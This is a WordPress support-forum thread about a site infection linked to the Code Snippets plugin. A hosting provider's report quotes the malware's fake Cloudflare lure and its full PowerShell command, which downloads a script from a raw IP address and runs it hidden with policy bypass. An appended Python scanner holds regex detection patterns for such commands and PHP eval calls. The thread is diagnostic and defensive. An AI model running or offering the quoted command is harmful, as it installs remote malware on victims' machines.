Viewing 9 replies - 1 through 9 (of 9 total)
  • Jeff Mankini

    (@jeffmankini)

    Hi Bruno,

    It looks like your site may be infected with malware. From what I can see, this doesn’t appear to be coming from the Code Snippets plugin itself, but rather from a malicious script that’s been added somewhere on your site.

    Do you happen to recall any of the last few snippets you may have added? That might help us narrow down where this could be coming from.

    Cheers,

    Jeff
    The Code Snippets Team

    Thread Starter Bruno Martinez

    (@brmartinez)

    Hello, answering your inquiries:

    1. No, the malware script was found in your plugin. Removing your plugin removed the virus. We’ve tried this twice (reinstalling it opened the door for a new infection, so we’ve had to remove it again);
    2. No, we’re not using your plugin anymore, and since then, we haven’t had any infections (it’s a pity, actually, because your plugin is really great. Congrats for that, by the way).

    Here’s a list of all our snippets:

    Rank Math Rules Exclusions (PHP)
    ===============================
    /**
     * Filter to disable some tests
     */
    add_filter('rank_math/researches/tests', function ($tests, $type) {
        unset($tests['titleHasNumber']);
        unset($tests['lengthPermalink']);
        unset($tests['hasContentAI']);
        unset($tests['keywordInMetaDescription']);
        unset($tests['contentHasTOC']);
        unset($tests['keywordDensity']);
        unset($tests['keywordInSubheadings']);
        unset($tests['lengthContent']);
        return $tests;
    }, 10, 2 );

    Rank Math Filter to change the Post Meta Table Limit (PHP)
    ===============================
    /**
     * Filter to change the Post Meta Table Limit
     */
    add_filter('rank_math/seo_analysis/postmeta_table_limit', function ( $limit ) {
        return 5000000;
    } );

    RankMath Clear flush sitemap cache (PHP)
    ===============================
    add_filter( 'rank_math/sitemap/enable_caching', '__return_false');

    Rank Math Filter Fast indexing API error fix (PHP)
    ===============================
    add_filter( 'doing_it_wrong_trigger_error', '__return_false' );

    Filter to add Locations KML file in the sitemap (PHP)
    ===============================
    /**
     * Filter to add Locations KML file in the sitemap
     */
    add_filter( 'rank_math/sitemap/locations', '__return_true' );

    Modify imagify picture tag (PHP)
    ===============================
    add_filter( 'imagify_buffer', function( $html ) {
        // Apply changes only inside <div class="cs-overlay-background"> blocks
        $html = preg_replace_callback(
            '#<div[^>]*class=["\'][^"\']*cs-overlay-background[^"\']*["\'][^>]*>(.*?)</div>#is',
            function ( $divMatches ) {
                $divContent = $divMatches[1];

                // Modify picture tags WITH style attribute
                $divContent = preg_replace_callback(
                    '/<picture([^>]*?)style\s*=\s*["\']([^"\']*)["\']([^>]*)>/i',
                    function ( $matches ) {
                        $style = $matches[2];
                        if ( stripos( $style, 'height' ) === false ) {
                            $style = rtrim( $style, '; ' ) . '; height:100%;';
                        }
                        return '<picture' . $matches[1] . 'style="' . $style . '"' . $matches[3] . '>';
                    },
                    $divContent
                );

                // Modify picture tags WITHOUT style attribute
                $divContent = preg_replace(
                    '/<picture(?![^>]*\bstyle=)([^>]*)>/i',
                    '<picture style="height:100%;"$1>',
                    $divContent
                );

                // Return modified div
                return str_replace($divMatches[1], $divContent, $divMatches[0]);
            },
            $html
        );
        return $html;
    } );

    Mastodon Tag (HTML)
    ===============================
    <meta name="fediverse:creator" content="@[email protected]">

    If you need anything else, just let me know.

    Kind regards and thanks for helping out! 🙂

    Plugin Author Shea Bunge

    (@bungeshea)

    Hi @brmartinez,

    I can confirm we don’t have anything remotely like that in the distributed plugin – we don’t even have anything to do with CloudFlare.

    It’s possible that your copy of the plugin became infected somehow, and if so, it points to a vulnerability in your system that I’d definitely recommend trying to identify. Once dealt with, redownloading a fresh copy of the plugin from this site should resolve issues.

    Thread Starter Bruno Martinez

    (@brmartinez)

    By your answer, it seems you didn’t understand how the virus works: it SIMULATES a FAKE CloudFlare screen. So it does not relate to the official Cloudflare service at all, ok?

    I’ve removed the plugin, then reinstalled it. After a few days, the virus returned.

    In my latest test, I’ve now removed the plugin again, then deleted leftover tables from it, and installed it again. I’ll let you know if the virus returns.

    Plugin Author Shea Bunge

    (@bungeshea)

    I understand your description of what’s happening – I was suggesting the improbability of it being tied up with the distributed plugin code as the behaviour you describe is not remotely close to the plugin’s functionality.

    Can I ask where you found the malware script in the plugin? Which source file etc?

    Thread Starter Bruno Martinez

    (@brmartinez)

    The devs at my server found it. Here’s what they explained to me on July 10th:

    “We’ve found malware on your site and the same was related to the “code-snippets” plugin. This malware is particularly dangerous, as it shows a fake Cloudflare screen that prompts the user to execute a PowerShell command that downloads and runs a script:

    powershell -w h -c “$f=$env:TEMP+’\\’+[guid]::NewGuid()+’.ps1′;curl http://185.100.157.79/wXq.dof -o $f;powershell -w h -ep Bypass -f $f”

    Currently, the plugin is enabled, and if you disable it, the required authentication (fake Cloudflare page) will not be presented.”

    Plugin Author Imants

    (@0aksmith)

    Hi @brmartinez,

    Thanks so much for following up and sharing the details.
    I really appreciate the time you’ve taken to test and report what you’re seeing.

    From your description, it does sound like the Code Snippets plugin may be getting leveraged directly, or as part of a broader exploit chain, especially given the flexibility it offers for running custom code. I completely understand how concerning this must be, and I want to reassure you that we take this seriously.

    Here are some steps we recommend to help secure and restore your WordPress site:

    • Activate Code Snippets Safe Mode:
      This pauses all snippets so you can safely access your site and troubleshoot without executing custom code. See: Help! My site broke! How can I fix it?
    • Reinstall WordPress Core:
      Replace all core WordPress files with fresh copies to eliminate any hidden backdoors.
    • Check and Clean Critical Directories:
      • Look through the uploads folder for any unfamiliar files.
      • Review post content, custom fields, and database entries for hidden or obfuscated scripts.
      • Inspect your wp-config.php file for any unauthorized changes.
    • Audit Users and Permissions:
      • Remove any unknown admin users.
      • Update passwords for all admin accounts, and change your database and FTP credentials.
    • Update All Plugins and Themes:
      • Remove any unused or untrusted plugins/themes.
      • Make sure everything is running the latest secure version.
    • Restore from a Clean Backup (if available):
      If you have a backup from before the issue started, restoring it can be a great way to get back to a clean state.
    • Scan for Malware and Vulnerabilities:
      Use a trusted security plugin like Patchstack, Wordfence, Sucuri, or Jetpack Protect to scan your site for hacked files, suspicious code, or vulnerabilities.
    • Review Recent Snippets:
      • Disable or delete any snippets that you didn’t add or that look suspicious.
      • Look out for snippets that could allow uploads or remote code execution.

    Also, just a quick note: when sharing examples or links, please try to remove or redact any direct URLs in malicious payloads, like: http[:]//cant.click/here
    This helps keep others safe from accidentally clicking on them.

    If you ever come across a vulnerability in the plugin itself, we’d really appreciate it if you could contact us directly here: https://codesnippets.pro/contact/
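
A triage pass for the "Review Recent Snippets" and "hidden or obfuscated scripts" steps listed above, as an added example that is not part of the thread or of the Code Snippets plugin. It flags snippet bodies exported from the site that contain PHP execution, decoder or file-write calls, or the PowerShell switches quoted by the hosting provider, and it also checks one decoded layer of any long base64 literal. The export step, the rule set and the sample records are assumptions constructed for illustration.

```python
import base64
import re

# Assumed rule set for this example; a starting point for review, not a complete signature list.
RULES = {
    "ps-hidden-window": re.compile(r"powershell[^\n]*\s-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "ps-policy-bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I),
    "php-dynamic-eval": re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I),
    "php-decoder": re.compile(r"\b(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "php-command-exec": re.compile(r"\b(?:shell_exec|passthru|proc_open|system)\s*\(", re.I),
    "php-file-write": re.compile(r"\b(?:move_uploaded_file|file_put_contents)\s*\(", re.I),
}
# Long base64-looking literals are decoded once so a wrapped payload is still inspected.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decoded_layers(text):
    """Yield the text itself, then one decoded layer per long base64 literal in it."""
    yield text
    for blob in B64_BLOB.findall(text):
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64 (binascii.Error subclasses ValueError)
            continue


def scan(code):
    """Return the sorted names of the rules matching the code or a decoded layer."""
    hits = set()
    for layer in decoded_layers(code):
        hits.update(name for name, rx in RULES.items() if rx.search(layer))
    return sorted(hits)


def triage(snippets):
    """Map snippet name -> rule hits, leaving out snippets with no hits."""
    return {name: hits for name, code in snippets if (hits := scan(code))}


# Constructed records: one benign snippet from this thread, one inert obfuscated sample.
LURE = 'echo "powershell -w h -ep Bypass -f PLACEHOLDER.ps1";'
SAMPLES = [
    ("sitemap cache", "add_filter( 'rank_math/sitemap/enable_caching', '__return_false');"),
    ("constructed-obfuscated",
     "eval(base64_decode('%s'));" % base64.b64encode(LURE.encode()).decode()),
]

if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

A hit means the snippet deserves a manual read, not that it is malicious; the same pass can be run over exported post content and option values.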

    Thread Starter Bruno Martinez

    (@brmartinez)

    Thanks. Can someone in your team be available to help me out with these tasks? I’m not a developer and I don’t have one, so I won’t be able to follow on this alone.

    Plugin Author Imants

    (@0aksmith)

    Bruno.
    Our team specializes primarily in plugin development, so when it comes to dealing with security issues or cleaning up malicious files, your hosting provider is often best equipped to help.

    Given the gravity of the exploit found on your site, I highly recommend reaching out to professional WordPress incident response services as they will have the expertise and tools to help you fully secure, recover and protect your website.
